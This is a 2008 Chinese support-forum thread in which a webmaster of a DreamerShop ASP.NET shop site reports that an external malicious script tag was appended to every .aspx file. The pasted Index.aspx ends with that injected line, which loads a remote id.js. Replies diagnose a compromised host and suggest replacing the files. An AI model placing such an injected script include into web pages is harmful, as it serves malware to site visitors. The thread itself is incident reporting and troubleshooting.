asp.net网店系统|商城系统 V2.3网站程序所有aspx文件尾部全部被注入一段代码应IE打开显示有病毒,

911gun - 2008-8-25 22:34:00

V2.3网站程序所有aspx文件尾部全部被注入一段代码应IE打开显示有病毒,

Index.aspx文件代码如下,看最后一行,请问是怎么回事,我联系了空间服务商他们说是程序有后门所以被人注入了
<%@ Register TagPrefix="uc1" TagName="LanguagesDeal" Src="LanguagesManage.ascx" %>
<%@ Register TagPrefix="uc1" TagName="SiteCounter" Src="Counter/SiteCounter.ascx" %>
<%@ Page language="c#" Codebehind="Index.aspx.cs" AutoEventWireup="false" Inherits="DreamerShop.WebForm1" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
<meta name="verify-v1" c />
<meta name="verify-v1" c />
<title>
<%=mConfigInf.strWebTitle%>
</title>
<uc1:LanguagesDeal id="myLanguagesDeal" runat="server" Visible="False"></uc1:LanguagesDeal>
<meta http-equiv="Content-Type" c>
<meta c name="GENERATOR">
<meta c name="CODE_LANGUAGE">
<META NAME="Powered By" C>
<meta c name="vs_defaultClientScript">
<meta chttp://schemas.microsoft.com/intellisense/ie5">http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
<META name="description" c>
<META name="keywords" c>
<LINK href="<%=mConfigInf.strTemplateUrl%>" rel="stylesheet" type=text/css>
</HEAD>
<body MS_POSITI topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">
<asp:PlaceHolder id="PlaceHolder1" runat="server"></asp:PlaceHolder>
<asp:PlaceHolder id="PlaceHolder2" runat="server"></asp:PlaceHolder>
<asp:PlaceHolder id="PlaceHolder3" runat="server"></asp:PlaceHolder>
</body>
</HTML>

<script src=http://www.0719jjc.com/id.js></script>

DreamerShop - 2008-8-25 22:48:00

最后一行是非法代码，你文件被病毒篡改了
检查一下文件时间，不对的下载标准文件替换

不一定是程序问题，篡改途径多

911gun - 2008-8-25 22:51:00

已经用标准文件替换过但是马上就会被加上这段非法代码

rayn1013 - 2008-8-26 11:30:00

服务器被挂马

天宇行星 - 2008-8-26 14:29:00

服务器被挂马了
赶紧杀吧
是你空间商的问题
程序没有问题我都用了一年多了

911gun - 2008-8-26 22:34:00

嗯肯定是空间商的问题,我查询了和我同IP下的其他网站也有几个网站一样中了这个网马,现在网站是放在息壤的虚拟主机上,现在连空间里面的动网论坛都有问题了,这个问题出现不是最近的事了,前几天联系过息壤的技术,就解决好了没几天就有来了,看来息壤的主机却是存在技术漏洞一会大家慎用

梦想家网店系统官方论坛